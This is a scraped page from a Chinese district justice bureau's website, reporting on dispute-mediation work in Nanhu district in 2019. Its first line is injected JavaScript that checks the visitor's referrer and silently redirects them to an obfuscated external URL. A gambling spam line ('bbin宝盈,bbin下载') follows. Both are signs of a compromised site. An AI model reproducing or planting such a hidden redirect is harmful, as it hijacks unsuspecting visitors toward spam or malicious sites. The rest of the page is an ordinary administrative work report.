var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 各地信息
发布日期:2019-10-28 浏览次数: 字号:[ ]

为落实多元矛盾纠纷化解机制建设,为我区多元矛盾纠纷化解提供更多样化的渠道、培养更为精干的多元矛盾纠纷化解主体、形成更为完善高效的配合协作机制,努力为“平安南湖”“和谐南湖”做贡献,区司法局积极参与多元矛盾纠纷化解工作。今年截至10月份,全区司法行政系统共受理调处矛盾纠纷4645件,成功调处4639件,其中,重大矛盾纠纷389件,无涉及50人以上的矛盾纠纷,涉及死亡纠纷45件。  

一是完善制度,强化多元化解协作。针对多元化解机制建设方案要求,对照检查,找准薄弱环节,不断完善多元化解制度建设。加强区多元化解中心建设,更新完善相关制度,如矛盾纠纷多元化解告知制度、多元化解责任制度、多元化解移交制度等;不断健全矛盾纠纷排查调处机制,积极做好“警调对接”“援调对接”、“诉调对接”  

二是注重整合,强化多元化解效能。多元的基础是参与主体的多样式,整合调解资源,形成以人民调解为基础,司法调解、行政调解为辅的多元化联动机制。建立由人民调解、法院、检察、公安、律师、鉴定、公证、心理等专家人员以及区级国土、住建、交警、卫生等部门业务骨干的“多元调解专家库”,为重大疑难矛盾纠纷攻坚提供强有力的专业化支撑。充分发挥职能作用,服务“三改一拆”“小城镇综合整治”“剿劣攻坚战”“五水共治”“中心城市品质提升”等专项工作。  

三是强化基础,加强队伍建设。按照“贴近民心、畅通民意、源头预防、人性化解”的原则,依托各镇(街道)、村(社区),已在全区创建57家品牌调解室。目前,这些品牌调解室均设有独立办公室,调解员都是常年工作在调解第一线的明星调解员,具有丰富的调解经验和良好的群众基础,调解员能充分利用人熟、地熟、业务熟、情况熟的优势,发挥“区域明星”的特殊优势,化解各类矛盾纠纷,成为当地党委、政府的好帮手,为民解忧的明星老娘舅。同时,在调解过程中对群众开展潜移默化的法治宣传教育,使群众自觉接受法律知识、传统文化、伦理道德以及调解知识。  

南湖区局

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统